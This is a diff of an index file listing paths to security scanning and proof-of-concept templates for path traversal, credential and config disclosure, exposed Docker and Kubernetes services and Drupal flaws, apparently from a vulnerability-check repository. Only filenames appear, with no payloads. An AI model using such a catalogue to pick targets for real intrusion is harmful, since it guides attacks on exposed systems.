./poc/detect/zabbix-version-detect.yaml ./poc/detect/zebra-printer-detect.yaml -./poc/detect/zentao-detect-11785.yaml ./poc/detect/zentao-detect-11786.yaml +./poc/detect/zentao-detect-11787.yaml ./poc/detect/zentao-detect.yaml ./poc/detect/zentral-detection.yaml ./poc/detect/zentral-detection.yml ./poc/detect/zm-system-log-detect-1.yaml -./poc/detect/zm-system-log-detect-11834.yaml +./poc/detect/zm-system-log-detect-11833.yaml ./poc/detect/zm-system-log-detect-2.yaml ./poc/detect/zm-system-log-detect.yaml ./poc/directory_listing/Apexis-IPCAM-directory-traversal.yaml @@ -43971,7 +43940,7 @@ ./poc/directory_listing/aero-cms-directory-traversal.yaml ./poc/directory_listing/apache-httpd-cve-2021-41773-path-traversal.yml ./poc/directory_listing/bitrix-path-traversal.yaml -./poc/directory_listing/carel-bacnet-gateway-traversal.yaml +./poc/directory_listing/carel-bacnet-gateway-traversal-858.yaml ./poc/directory_listing/carel-pcoweb-hvac-bacnet-gateway-directory-traversal.yaml ./poc/directory_listing/changjet-tplus-downloadproxy-traversal.yaml ./poc/directory_listing/citrix-cve-2019-19781-path-traversal.yml @@ -43979,7 +43948,6 @@ ./poc/directory_listing/custom-solr-path-traversal.yaml ./poc/directory_listing/digitalrebar-traversal-6996.yaml ./poc/directory_listing/digitalrebar-traversal-6997.yaml -./poc/directory_listing/digitalrebar-traversal.yaml ./poc/directory_listing/dir-traversal.yaml ./poc/directory_listing/directory-traversal.yaml ./poc/directory_listing/django-directory-traversal.yaml @@ -43989,10 +43957,11 @@ ./poc/directory_listing/ecology-filedownload-directory-traversal-7171.yaml ./poc/directory_listing/ecology-filedownload-directory-traversal-7172.yaml ./poc/directory_listing/ecology-filedownload-directory-traversal.yml -./poc/directory_listing/ecology-springframework-directory-traversal-7175.yaml +./poc/directory_listing/ecology-springframework-directory-traversal-7174.yaml ./poc/directory_listing/ecology-springframework-directory-traversal.yaml ./poc/directory_listing/ecology-springframework-directory-traversal.yml ./poc/directory_listing/ecology-springframework-directoryTraversal.yaml +./poc/directory_listing/elfinder-path-traversal-7203.yaml ./poc/directory_listing/elfinder-path-traversal.yaml ./poc/directory_listing/erp-nc-directory-traversal-7245.yaml ./poc/directory_listing/erp-nc-directory-traversal-7246.yaml @@ -44011,7 +43980,6 @@ ./poc/directory_listing/flir-path-traversal-7520.yaml ./poc/directory_listing/flir-path-traversal-7522.yaml ./poc/directory_listing/flir-path-traversal-7523.yaml -./poc/directory_listing/flir-path-traversal.yaml ./poc/directory_listing/forked-daapd-path-traversal.yaml ./poc/directory_listing/hidden-path-traversal.yaml ./poc/directory_listing/ibm-infoprint-directory-traversal-8098.yaml @@ -44023,26 +43991,25 @@ ./poc/directory_listing/kingdee-eas-DirectoryTraversal.yaml ./poc/directory_listing/kingdee-eas-directory-traversal-8488.yaml ./poc/directory_listing/kingdee-eas-directory-traversal-8489.yaml -./poc/directory_listing/kingdee-eas-directory-traversal.yaml ./poc/directory_listing/kingdee-eas-directory-traversal.yml ./poc/directory_listing/natshell-path-traversal-9005.yaml ./poc/directory_listing/natshell-path-traversal-9006.yaml ./poc/directory_listing/natshell-path-traversal-9007.yaml ./poc/directory_listing/natshell-path-traversal-9008.yaml -./poc/directory_listing/natshell-path-traversal.yaml ./poc/directory_listing/netmizer-log-management-data-directory-traversal.yaml ./poc/directory_listing/nexusdb-cve-2020-24571-path-traversal.yml ./poc/directory_listing/nginx-merge-slashes-path-traversal-1.yaml ./poc/directory_listing/nginx-merge-slashes-path-traversal-2.yaml ./poc/directory_listing/nginx-merge-slashes-path-traversal-3.yaml ./poc/directory_listing/nginx-merge-slashes-path-traversal-9104.yaml -./poc/directory_listing/nginx-merge-slashes-path-traversal-9105.yaml +./poc/directory_listing/nginx-merge-slashes-path-traversal.yaml ./poc/directory_listing/nginx_path_traversal.yaml ./poc/directory_listing/nuxt-path-traversal.yaml ./poc/directory_listing/oa-tongda-path-traversal-9175.yaml ./poc/directory_listing/oa-tongda-path-traversal-9176.yaml ./poc/directory_listing/oa-tongda-path-traversal-9177.yaml ./poc/directory_listing/oa-tongda-path-traversal-9178.yaml +./poc/directory_listing/oa-tongda-path-traversal-9179.yaml ./poc/directory_listing/oa-tongda-path-traversal.yaml ./poc/directory_listing/path-traversal-exposure.yaml ./poc/directory_listing/path-traversal.yaml @@ -44051,15 +44018,15 @@ ./poc/directory_listing/pmb-directory-traversal-9610.yaml ./poc/directory_listing/pmb-directory-traversal-9611.yaml ./poc/directory_listing/pmb-directory-traversal-9612.yaml +./poc/directory_listing/pmb-directory-traversal-9613.yaml ./poc/directory_listing/pmb-directory-traversal-9614.yaml -./poc/directory_listing/pmb-directory-traversal.yaml ./poc/directory_listing/tpshop-directory-traversal-10821.yaml ./poc/directory_listing/tpshop-directory-traversal-10822.yaml ./poc/directory_listing/tpshop-directory-traversal-10823.yaml ./poc/directory_listing/tpshop-directory-traversal.yml ./poc/directory_listing/weiphp-path-traversal.yaml ./poc/directory_listing/weiphp-path-traversal.yml -./poc/directory_listing/wooyun-path-traversal-11230.yaml +./poc/directory_listing/wooyun-path-traversal-11229.yaml ./poc/directory_listing/wooyun-path-traversal-11231.yaml ./poc/directory_listing/wooyun-path-traversal-11232.yaml ./poc/directory_listing/wooyun-path-traversal-11233.yaml @@ -44073,8 +44040,8 @@ ./poc/docker/amazon-docker-config-279.yaml ./poc/docker/amazon-docker-config-disclosure.yaml ./poc/docker/amazon-docker-config.yaml -./poc/docker/aws-ecs-container-agent-tasks-639.yaml ./poc/docker/aws-ecs-container-agent-tasks-640.yaml +./poc/docker/aws-ecs-container-agent-tasks-641.yaml ./poc/docker/aws-ecs-container-agent-tasks.yaml ./poc/docker/container-registry-exposure.yaml ./poc/docker/docker-api-detection.yaml @@ -44111,14 +44078,12 @@ ./poc/docker/docker-remote-api.yaml ./poc/docker/dockercfg-config-1.yaml ./poc/docker/dockercfg-config-2.yaml -./poc/docker/dockercfg-config-7055.yaml ./poc/docker/dockercfg-config-7056.yaml ./poc/docker/dockercfg.yaml ./poc/docker/dockerfile-disclosure.yaml ./poc/docker/dockerfile-hidden-disclosure-1.yaml ./poc/docker/dockerfile-hidden-disclosure-2.yaml ./poc/docker/dockerfile-hidden-disclosure-7061.yaml -./poc/docker/dockerfile-hidden-disclosure-7062.yaml ./poc/docker/dockerfile-hidden-disclosure-7063.yaml ./poc/docker/dockerfile-hidden-disclosure.yaml ./poc/docker/dockerrun-aws-config-page.yaml @@ -44133,24 +44098,27 @@ ./poc/docker/kubernetes-dashboard-8526.yaml ./poc/docker/kubernetes-dashboard.yaml ./poc/docker/kubernetes-enterprise-manager-8527.yaml +./poc/docker/kubernetes-enterprise-manager-8528.yaml ./poc/docker/kubernetes-enterprise-manager-8529.yaml -./poc/docker/kubernetes-enterprise-manager-8530.yaml ./poc/docker/kubernetes-enterprise-manager.yaml ./poc/docker/kubernetes-etcd-keys.yaml ./poc/docker/kubernetes-fake-certificate.yaml ./poc/docker/kubernetes-kustomization-disclosure-8531.yaml -./poc/docker/kubernetes-kustomization-disclosure-8532.yaml +./poc/docker/kubernetes-kustomization-disclosure-8533.yaml +./poc/docker/kubernetes-kustomization-disclosure.yaml ./poc/docker/kubernetes-metrics-8534.yaml ./poc/docker/kubernetes-metrics-8535.yaml ./poc/docker/kubernetes-metrics-8536.yaml ./poc/docker/kubernetes-mirantis-8537.yaml ./poc/docker/kubernetes-mirantis-8538.yaml +./poc/docker/kubernetes-mirantis-8539.yaml ./poc/docker/kubernetes-mirantis-8540.yaml ./poc/docker/kubernetes-mirantis-8541.yaml ./poc/docker/kubernetes-mirantis.yaml ./poc/docker/kubernetes-pods-1.yaml ./poc/docker/kubernetes-pods-2.yaml ./poc/docker/kubernetes-pods-8542.yaml +./poc/docker/kubernetes-pods-8543.yaml ./poc/docker/kubernetes-pods-8544.yaml ./poc/docker/kubernetes-pods-8546.yaml ./poc/docker/kubernetes-pods-api.yaml @@ -44158,16 +44126,16 @@ ./poc/docker/kubernetes-resource-report-8547.yaml ./poc/docker/kubernetes-resource-report-8548.yaml ./poc/docker/kubernetes-resource-report-8549.yaml -./poc/docker/kubernetes-unauth(1).yaml +./poc/docker/kubernetes-unauth.yaml ./poc/docker/kubernetes-unauth.yml ./poc/docker/kubernetes-version-8550.yaml ./poc/docker/kubernetes-version-8551.yaml -./poc/docker/kubernetes-version-8552.yaml ./poc/docker/kubernetes-version-8553.yaml +./poc/docker/kubernetes-version.yaml ./poc/docker/kubernetes-web-view.yaml ./poc/docker/kubernetes.yaml +./poc/docker/misconfigured-docker-8900.yaml ./poc/docker/misconfigured-docker-8901.yaml -./poc/docker/misconfigured-docker-8902.yaml ./poc/docker/misconfigured-docker.yaml ./poc/docker/oracle-containers-panel.yaml ./poc/drupal/drupal-7-elfinder.yaml @@ -44176,6 +44144,7 @@ ./poc/drupal/drupal-cve-2019-6340.yml ./poc/drupal/drupal-full-path-disclosure.yaml ./poc/drupal/drupal-install-7105.yaml +./poc/drupal/drupal-install-7106.yaml ./poc/drupal/drupal-install-7108.yaml ./poc/drupal/drupal-install.yaml ./poc/drupal/drupal-login.yaml @@ -44185,14 +44154,14 @@ ./poc/drupal/drupal-user-enum-ajax-3.yaml ./poc/drupal/drupal-user-enum-ajax-4.yaml ./poc/drupal/drupal-user-enum-ajax-7109.yaml +./poc/drupal/drupal-user-enum-ajax-7110.yaml ./poc/drupal/drupal-user-enum-ajax-7111.yaml ./poc/drupal/drupal-user-enum-redirect-1.yaml ./poc/drupal/drupal-user-enum-redirect-2.yaml ./poc/drupal/drupal-user-enum-redirect-3.yaml ./poc/drupal/drupal-user-enum-redirect-4.yaml -./poc/drupal/drupal-user-enum-redirect-7113.yaml +./poc/drupal/drupal-user-enum-redirect-7112.yaml ./poc/drupal/drupal-user-enum-redirect-7115.yaml -./poc/drupal/drupal-user-enum-redirect.yaml ./poc/drupal/drupal-workflow.yaml ./poc/drupal/drupal.yaml ./poc/drupal/drupal_module-acl-arbitrary-php-code-execution.yaml @@ -44513,7 +44482,6 @@ ./poc/elk/elasticsearch-2.yaml ./poc/elk/elasticsearch-5-version.yaml ./poc/elk/elasticsearch-7193.yaml -./poc/elk/elasticsearch-7194.yaml ./poc/elk/elasticsearch-7195.yaml ./poc/elk/elasticsearch-7196.yaml ./poc/elk/elasticsearch-cluster-health.yaml @@ -44540,7 +44508,6 @@ ./poc/elk/exposed-kibana-1.yaml ./poc/elk/exposed-kibana-2.yaml ./poc/elk/exposed-kibana-7319.yaml -./poc/elk/exposed-kibana-7320.yaml ./poc/elk/exposed-kibana.yaml ./poc/elk/kibana-cve-2018-17246.yml ./poc/elk/kibana-detect-1.yaml @@ -44549,7 +44516,7 @@ ./poc/elk/kibana-detect-8484.yaml ./poc/elk/kibana-detect.yaml ./poc/elk/kibana-panel-8485.yaml -./poc/elk/kibana-panel-8487.yaml +./poc/elk/kibana-panel-8486.yaml ./poc/elk/kibana-panel.yaml ./poc/elk/kibana-unauth.yaml ./poc/elk/kibana-unauth.yml @@ -44613,14 +44580,14 @@ ./poc/exposed/ampache-update-exposure.yaml ./poc/exposed/android-debug-database-exposed-312.yaml ./poc/exposed/android-debug-database-exposed-313.yaml -./poc/exposed/android-debug-database-exposed-314.yaml ./poc/exposed/android-debug-database-exposed-315.yaml +./poc/exposed/android-debug-database-exposed-316.yaml ./poc/exposed/android-debug-database-exposed.yaml ./poc/exposed/ansible-config-disclosure-325.yaml -./poc/exposed/ansible-config-disclosure-326.yaml +./poc/exposed/ansible-config-disclosure.yaml ./poc/exposed/ansible-tower-exposure-329.yaml ./poc/exposed/ansible-tower-exposure-330.yaml -./poc/exposed/ansible-tower-exposure-331.yaml +./poc/exposed/ansible-tower-exposure-332.yaml ./poc/exposed/ansible-tower-exposure.yaml ./poc/exposed/apache-access-log-exposure.yaml ./poc/exposed/apache-config-exposure.yaml @@ -44635,18 +44602,18 @@ ./poc/exposed/appspec-yml-disclosure-1.yaml ./poc/exposed/appspec-yml-disclosure-2.yaml ./poc/exposed/appspec-yml-disclosure-527.yaml -./poc/exposed/appspec-yml-disclosure-528.yaml +./poc/exposed/appspec-yml-disclosure-529.yaml ./poc/exposed/aspnetmvc-version-disclosure.yaml ./poc/exposed/atlassian-jira-info-disclosure.yaml ./poc/exposed/atom-sync-exposure.yaml ./poc/exposed/avtech-dvr-exposure-614.yaml ./poc/exposed/avtech-dvr-exposure-615.yaml -./poc/exposed/avtech-dvr-exposure.yaml +./poc/exposed/avtech-dvr-exposure-616.yaml ./poc/exposed/avtech-password-disclosure.yaml ./poc/exposed/axiom-digitalocean-key-exposure-665.yaml ./poc/exposed/axiom-digitalocean-key-exposure-666.yaml ./poc/exposed/axiom-digitalocean-key-exposure-667.yaml -./poc/exposed/axiom-digitalocean-key-exposure.yaml +./poc/exposed/axiom-digitalocean-key-exposure-668.yaml ./poc/exposed/azure-apim-secret-key-disclosure.yaml ./poc/exposed/azure-pipelines-config-disclosure.yaml ./poc/exposed/azure-pipelines-exposed.yaml @@ -44656,6 +44623,7 @@ ./poc/exposed/beward-ipcamera-disclosure-714.yaml ./poc/exposed/beward-ipcamera-disclosure-716.yaml ./poc/exposed/beward-ipcamera-disclosure-717.yaml +./poc/exposed/beward-ipcamera-disclosure.yaml ./poc/exposed/bitly-secret-key-disclosure.yaml ./poc/exposed/bitrix-full-path-disclosure.yaml ./poc/exposed/broadcom-backupsettings-exposure.yaml @@ -44663,7 +44631,6 @@ ./poc/exposed/caucho-resin-info-disclosure-1.yaml ./poc/exposed/caucho-resin-info-disclosure-2.yaml ./poc/exposed/caucho-resin-info-disclosure-872.yaml -./poc/exposed/caucho-resin-info-disclosure.yaml ./poc/exposed/cisco-meraki-exposure-944.yaml ./poc/exposed/cisco-meraki-exposure-945.yaml ./poc/exposed/cisco-meraki-exposure.yaml @@ -44672,31 +44639,32 @@ ./poc/exposed/cisco-smi-exposure-972.yaml ./poc/exposed/clockwork-dashboard-exposure-1012.yaml ./poc/exposed/clockwork-dashboard-exposure-1013.yaml +./poc/exposed/clockwork-dashboard-exposure-1015.yaml ./poc/exposed/clockwork-dashboard-exposure.yaml ./poc/exposed/cobbler-exposed-directories.yaml ./poc/exposed/commax-credentials-disclosure-1158.yaml ./poc/exposed/commax-credentials-disclosure-1159.yaml +./poc/exposed/commax-credentials-disclosure-1160.yaml ./poc/exposed/comtrend-password-exposure-1166.yaml ./poc/exposed/comtrend-password-exposure-1167.yaml ./poc/exposed/container-registry-exposure.yaml ./poc/exposed/coremail-config-disclosure-1213.yaml +./poc/exposed/coremail-config-disclosure-1214.yaml ./poc/exposed/coremail-config-disclosure-1215.yaml -./poc/exposed/coremail-config-disclosure-1216.yaml ./poc/exposed/coremail-config-disclosure.yaml ./poc/exposed/couchdb-exposure-1239.yaml ./poc/exposed/couchdb-exposure-1240.yaml ./poc/exposed/couchdb-exposure-1241.yaml ./poc/exposed/couchdb-exposure.yaml -./poc/exposed/credential-exposure-1249.yaml ./poc/exposed/credential-exposure-1250.yaml -./poc/exposed/credential-exposure-1251.yaml +./poc/exposed/credential-exposure-file.yaml ./poc/exposed/credential-exposure.yaml ./poc/exposed/credentials-disclosure-1252.yaml ./poc/exposed/credentials-disclosure-1253.yaml ./poc/exposed/credentials-disclosure-1254.yaml +./poc/exposed/credentials-disclosure-1255.yaml ./poc/exposed/credentials-disclosure-1256.yaml ./poc/exposed/credentials-disclosure-all.yaml -./poc/exposed/credentials-disclosure.yaml ./poc/exposed/dahua-passowrd-disclosure.yaml ./poc/exposed/dashboard-exposed.yaml ./poc/exposed/database.json-exposure.yaml @@ -44712,12 +44680,11 @@ ./poc/exposed/dockerfile-hidden-disclosure-1.yaml ./poc/exposed/dockerfile-hidden-disclosure-2.yaml ./poc/exposed/dockerfile-hidden-disclosure-7061.yaml -./poc/exposed/dockerfile-hidden-disclosure-7062.yaml ./poc/exposed/dockerfile-hidden-disclosure-7063.yaml ./poc/exposed/dockerfile-hidden-disclosure.yaml ./poc/exposed/doorgets-info-disclosure.yaml +./poc/exposed/druid-console-exposure-7092.yaml ./poc/exposed/druid-console-exposure-7093.yaml -./poc/exposed/druid-console-exposure-7094.yaml ./poc/exposed/druid-console-exposure.yaml ./poc/exposed/drupal-full-path-disclosure.yaml ./poc/exposed/drupal_module-config_pages-information-disclosure.yaml @@ -44757,7 +44724,6 @@ ./poc/exposed/exposed-alps-spring-1.yaml ./poc/exposed/exposed-alps-spring-2.yaml ./poc/exposed/exposed-alps-spring-3.yaml -./poc/exposed/exposed-alps-spring-7283.yaml ./poc/exposed/exposed-alps-spring-7284.yaml ./poc/exposed/exposed-alps-spring-7285.yaml ./poc/exposed/exposed-alps-spring.yaml @@ -44769,11 +44735,14 @@ ./poc/exposed/exposed-authentication.asmx.yaml ./poc/exposed/exposed-backup-files.yaml ./poc/exposed/exposed-bitkeeper-7290.yaml -./poc/exposed/exposed-bitkeeper-7292.yaml +./poc/exposed/exposed-bitkeeper-7291.yaml ./poc/exposed/exposed-bitkeeper.yaml ./poc/exposed/exposed-bzr-7293.yaml +./poc/exposed/exposed-bzr-7295.yaml ./poc/exposed/exposed-bzr.yaml ./poc/exposed/exposed-darcs-7296.yaml +./poc/exposed/exposed-darcs-7297.yaml +./poc/exposed/exposed-darcs-7298.yaml ./poc/exposed/exposed-darcs.yaml ./poc/exposed/exposed-docker-api-1.yaml ./poc/exposed/exposed-docker-api-2.yaml @@ -44788,11 +44757,10 @@ ./poc/exposed/exposed-gitignore-1.yaml ./poc/exposed/exposed-gitignore-2.yaml ./poc/exposed/exposed-gitignore-3.yaml -./poc/exposed/exposed-gitignore-7302.yaml ./poc/exposed/exposed-gitignore-7303.yaml ./poc/exposed/exposed-gitignore-7304.yaml +./poc/exposed/exposed-gitignore-7305.yaml ./poc/exposed/exposed-gitignore-7306.yaml -./poc/exposed/exposed-gitignore.yaml ./poc/exposed/exposed-gitlab-ci-config.yaml ./poc/exposed/exposed-gits.yaml ./poc/exposed/exposed-glances-api-7307.yaml @@ -44800,30 +44768,29 @@ ./poc/exposed/exposed-glances-api-7310.yaml ./poc/exposed/exposed-grafana.yaml ./poc/exposed/exposed-hg-7311.yaml +./poc/exposed/exposed-hg-7312.yaml ./poc/exposed/exposed-hg.yaml ./poc/exposed/exposed-jenkins.yaml ./poc/exposed/exposed-jira.yaml ./poc/exposed/exposed-jquery-file-upload-7313.yaml ./poc/exposed/exposed-jquery-file-upload-7314.yaml ./poc/exposed/exposed-jquery-file-upload-7315.yaml -./poc/exposed/exposed-jquery-file-upload.yaml -./poc/exposed/exposed-kafdrop-7316.yaml ./poc/exposed/exposed-kafdrop-7317.yaml ./poc/exposed/exposed-kafdrop-7318.yaml ./poc/exposed/exposed-kafdrop.yaml ./poc/exposed/exposed-kibana-1.yaml ./poc/exposed/exposed-kibana-2.yaml ./poc/exposed/exposed-kibana-7319.yaml -./poc/exposed/exposed-kibana-7320.yaml ./poc/exposed/exposed-kibana.yaml ./poc/exposed/exposed-merge-metadata-servlet.yaml ./poc/exposed/exposed-mysql-initial-7321.yaml ./poc/exposed/exposed-mysql-initial-7322.yaml ./poc/exposed/exposed-mysql-initial-7323.yaml +./poc/exposed/exposed-mysql-initial-7324.yaml ./poc/exposed/exposed-nomad-7325.yaml ./poc/exposed/exposed-nomad-7326.yaml ./poc/exposed/exposed-nomad-7327.yaml -./poc/exposed/exposed-nomad-7328.yaml +./poc/exposed/exposed-nomad-7329.yaml ./poc/exposed/exposed-nomad.yaml ./poc/exposed/exposed-pagespeed-global-admin-7331.yaml ./poc/exposed/exposed-pagespeed-global-admin.yaml @@ -44832,27 +44799,26 @@ ./poc/exposed/exposed-prometheus-log-7332.yaml ./poc/exposed/exposed-prometheus-log-7333.yaml ./poc/exposed/exposed-prometheus-log.yaml +./poc/exposed/exposed-redis-7335.yaml ./poc/exposed/exposed-redis-7336.yaml ./poc/exposed/exposed-redis-7337.yaml ./poc/exposed/exposed-redis-7338.yaml ./poc/exposed/exposed-redis-7339.yaml ./poc/exposed/exposed-redis.yaml +./poc/exposed/exposed-service-now-7340.yaml ./poc/exposed/exposed-service-now-7341.yaml -./poc/exposed/exposed-service-now-7343.yaml ./poc/exposed/exposed-service-now.yaml ./poc/exposed/exposed-sharepoint-list-7344.yaml ./poc/exposed/exposed-sharepoint-list-7345.yaml ./poc/exposed/exposed-sharepoint-list-7346.yaml -./poc/exposed/exposed-sharepoint-list-7347.yaml ./poc/exposed/exposed-sonarqube.yaml ./poc/exposed/exposed-sqlite-manager-1.yaml ./poc/exposed/exposed-sqlite-manager-2.yaml ./poc/exposed/exposed-sqlite-manager-7349.yaml -./poc/exposed/exposed-sqlite-manager-7350.yaml ./poc/exposed/exposed-sqlite-manager.yaml ./poc/exposed/exposed-struts.yaml -./poc/exposed/exposed-svn-7351.yaml ./poc/exposed/exposed-svn-7352.yaml +./poc/exposed/exposed-svn-7353.yaml ./poc/exposed/exposed-svn-7354.yaml ./poc/exposed/exposed-svn-7355.yaml ./poc/exposed/exposed-svn.yaml @@ -44879,20 +44845,18 @@ ./poc/exposed/firebase-config-exposure-7485.yaml ./poc/exposed/firebase-config-exposure-7486.yaml ./poc/exposed/firebase-config-exposure-7487.yaml -./poc/exposed/firebase-config-exposure-7488.yaml -./poc/exposed/firebase-config-exposure.yaml ./poc/exposed/firebase-messaging-sw-js-exposure.yaml -./poc/exposed/flink-exposure-7509.yaml ./poc/exposed/flink-exposure-7510.yaml +./poc/exposed/flink-exposure-7511.yaml ./poc/exposed/flink-exposure.yaml ./poc/exposed/ftp-credentials-exposure-7567.yaml -./poc/exposed/ftp-credentials-exposure-7568.yaml +./poc/exposed/ftp-credentials-exposure.yaml ./poc/exposed/get-case-insensitive.yaml ./poc/exposed/git-config-exposure.yaml ./poc/exposed/git-credentials-disclosure-7639.yaml -./poc/exposed/git-credentials-disclosure-7640.yaml ./poc/exposed/git-credentials-disclosure-7641.yaml ./poc/exposed/git-credentials-disclosure-7642.yaml +./poc/exposed/git-credentials-disclosure.yaml ./poc/exposed/git-exposure.yaml ./poc/exposed/git-metadata-exposure.yaml ./poc/exposed/git-repo-disclosure.yaml @@ -44915,7 +44879,7 @@ ./poc/exposed/github-workflows-disclosure-5.yaml ./poc/exposed/github-workflows-disclosure-6.yaml ./poc/exposed/github-workflows-disclosure-7.yaml -./poc/exposed/github-workflows-disclosure-7664.yaml +./poc/exposed/github-workflows-disclosure-7665.yaml ./poc/exposed/github-workflows-disclosure-7666.yaml ./poc/exposed/github-workflows-disclosure-8.yaml ./poc/exposed/github-workflows-disclosure-9.yaml @@ -44927,10 +44891,10 @@ ./poc/exposed/glpi-status-ldap-domain-disclosure-3.yaml ./poc/exposed/glpi-telemetry-disclosure-1.yaml ./poc/exposed/glpi-telemetry-disclosure-2.yaml +./poc/exposed/glpi-telemetry-disclosure-7739.yaml ./poc/exposed/glpi-telemetry-disclosure.yaml ./poc/exposed/go-mod-disclosure.yaml ./poc/exposed/go-pprof-exposed.yaml -./poc/exposed/gogs-install-exposure-7755.yaml ./poc/exposed/gogs-install-exposure-7757.yaml ./poc/exposed/gogs-install-exposure-7758.yaml ./poc/exposed/gogs-install-exposure.yaml @@ -44943,10 +44907,10 @@ ./poc/exposed/graylog-endpoints-exposure.yaml ./poc/exposed/gruntfile-exposure-1.yaml ./poc/exposed/gruntfile-exposure-2.yaml -./poc/exposed/gruntfile-exposure.yaml +./poc/exposed/gruntfile-exposure-7852.yaml ./poc/exposed/hadoop-disclosure.yaml -./poc/exposed/hadoop-exposure-7872.yaml ./poc/exposed/hadoop-exposure-7873.yaml +./poc/exposed/hadoop-exposure-7874.yaml ./poc/exposed/hadoop-exposure.yaml ./poc/exposed/healthchecks-ui-exposure.yaml ./poc/exposed/hidden-api-key-exposure.yaml @@ -44954,7 +44918,6 @@ ./poc/exposed/hp-ilo-serial-key-disclosure-8022.yaml ./poc/exposed/hp-ilo-serial-key-disclosure-8024.yaml ./poc/exposed/hp-ilo-serial-key-disclosure-8025.yaml -./poc/exposed/hp-ilo-serial-key-disclosure.yaml ./poc/exposed/ibm-friendly-path-exposure-1.yaml ./poc/exposed/ibm-friendly-path-exposure-2.yaml ./poc/exposed/ibm-friendly-path-exposure-3.yaml @@ -44974,18 +44937,18 @@ ./poc/exposed/iceflow-vpn-disclosure-7.yaml ./poc/exposed/iceflow-vpn-disclosure-8.yaml ./poc/exposed/iceflow-vpn-disclosure-8127.yaml +./poc/exposed/iceflow-vpn-disclosure-8128.yaml ./poc/exposed/iceflow-vpn-disclosure.yaml ./poc/exposed/idea-folder-exposure-1.yaml ./poc/exposed/idea-folder-exposure-2.yaml ./poc/exposed/idea-logs-exposure-1.yaml ./poc/exposed/idea-logs-exposure-2.yaml -./poc/exposed/iis-internal-ip-disclosure-8148.yaml -./poc/exposed/iis-internal-ip-disclosure-8149.yaml ./poc/exposed/iis-internal-ip-disclosure.yaml ./poc/exposed/information-disclosure-in-js-files.yaml ./poc/exposed/internal-ip-disclosure.yaml ./poc/exposed/iotawatt-app-exposure-8186.yaml ./poc/exposed/iotawatt-app-exposure-8187.yaml +./poc/exposed/iotawatt-app-exposure.yaml ./poc/exposed/java-melody-exposed-1.yaml ./poc/exposed/java-melody-exposed-2.yaml ./poc/exposed/java-melody-exposed-8221.yaml @@ -45010,10 +44973,10 @@ ./poc/exposed/kpcms-socket-login-info-disclosure.yaml ./poc/exposed/kronos-wsld-exposure.yaml ./poc/exposed/kubernetes-kustomization-disclosure-8531.yaml -./poc/exposed/kubernetes-kustomization-disclosure-8532.yaml +./poc/exposed/kubernetes-kustomization-disclosure-8533.yaml +./poc/exposed/kubernetes-kustomization-disclosure.yaml ./poc/exposed/kyan-credential-exposure-8554.yaml -./poc/exposed/kyan-credential-exposure.yaml -./poc/exposed/kyan-network-credentials-disclosure-8556.yaml +./poc/exposed/kyan-credential-exposure-8555.yaml ./poc/exposed/kyan-network-credentials-disclosure.yaml ./poc/exposed/laravel-env-disclosure.yaml ./poc/exposed/laravel-telescope-exposed.yaml @@ -45030,10 +44993,11 @@ ./poc/exposed/magento-2-exposed-api-3.yaml ./poc/exposed/magento-2-exposed-api-8687.yaml ./poc/exposed/magento-2-exposed-api-8688.yaml -./poc/exposed/magento-2-exposed-api-8689.yaml +./poc/exposed/magento-config-disclosure.yaml ./poc/exposed/magento-information-disclosure.yaml ./poc/exposed/mapbox-token-disclosure.yaml ./poc/exposed/mobsf-framework-exposure.yaml +./poc/exposed/monitorix-exposure-8929.yaml ./poc/exposed/monitorix-exposure-8930.yaml ./poc/exposed/monitorix-exposure-8931.yaml ./poc/exposed/monitorix-exposure-8932.yaml @@ -45053,8 +45017,8 @@ ./poc/exposed/opcache-status-exposure-2.yaml ./poc/exposed/opcache-status-exposure-3.yaml ./poc/exposed/opcache-status-exposure-9254.yaml -./poc/exposed/opcache-status-exposure-9255.yaml -./poc/exposed/openbmcs-secret-disclosure.yaml +./poc/exposed/opcache-status-exposure.yaml +./poc/exposed/openbmcs-secret-disclosure-9260.yaml ./poc/exposed/openfire-credentials-exposure.yaml ./poc/exposed/openssh-sshd-config-disclosure.yaml ./poc/exposed/opentext-livesite-teamsite-database-info-exposure.yaml @@ -45064,6 +45028,7 @@ ./poc/exposed/oracle-ebs-credentials-disclosure.yaml ./poc/exposed/oracle-ebs-sqllog-disclosure-9367.yaml ./poc/exposed/oracle-ebs-sqllog-disclosure-9369.yaml +./poc/exposed/oracle-ebs-sqllog-disclosure-9370.yaml ./poc/exposed/oracle-ebs-sqllog-disclosure-9371.yaml ./poc/exposed/oracle-ebs-sqllog-disclosure-9372.yaml ./poc/exposed/oracle-ebs-sqllog-disclosure.yaml @@ -45077,8 +45042,8 @@ ./poc/exposed/php-debugbar-exposure.yaml ./poc/exposed/php-user-ini-disclosure-1.yaml ./poc/exposed/php-user-ini-disclosure-2.yaml -./poc/exposed/php-user-ini-disclosure-9559.yaml ./poc/exposed/php-user-ini-disclosure-9560.yaml +./poc/exposed/php-user-ini-disclosure-9561.yaml ./poc/exposed/php-user-ini-disclosure.yaml ./poc/exposed/phpinfo-disclosure-env.yaml ./poc/exposed/phpinfo-disclosure.yaml @@ -45088,7 +45053,7 @@ ./poc/exposed/pmb-local-file-disclosure-9616.yaml ./poc/exposed/pmb-local-file-disclosure-9617.yaml ./poc/exposed/pmb-local-file-disclosure-9618.yaml -./poc/exposed/pmb-local-file-disclosure.yaml +./poc/exposed/pmb-local-file-disclosure-9619.yaml ./poc/exposed/postman-api-key-disclosure.yaml ./poc/exposed/private-key-exposure-9654.yaml ./poc/exposed/prometheus-exposed-panel-9679.yaml @@ -45101,7 +45066,7 @@ ./poc/exposed/proton-recovery-phrase-disclosure.yaml ./poc/exposed/putty-private-key-disclosure-9729.yaml ./poc/exposed/putty-private-key-disclosure-9730.yaml -./poc/exposed/putty-private-key-disclosure-9731.yaml +./poc/exposed/putty-private-key-disclosure-9732.yaml ./poc/exposed/putty-private-key-disclosure.yaml ./poc/exposed/pyproject-disclosure-9735.yaml ./poc/exposed/pyproject-disclosure-9736.yaml @@ -45111,6 +45076,7 @@ ./poc/exposed/qihang-media-disclosure-9763.yaml ./poc/exposed/qihang-media-disclosure-9764.yaml ./poc/exposed/qihang-media-disclosure-9765.yaml +./poc/exposed/qihang-media-disclosure.yaml ./poc/exposed/qvidium-management-system-exposed.yaml ./poc/exposed/qywechat-secret-disclosure.yaml ./poc/exposed/rabbitmq-config-exposure.yml @@ -45135,8 +45101,8 @@ ./poc/exposed/ruijie-information-disclosure-9930.yaml ./poc/exposed/ruijie-information-disclosure-9932.yaml ./poc/exposed/ruijie-nbr1300g-exposure-9935.yaml -./poc/exposed/ruijie-nbr1300g-exposure-9936.yaml 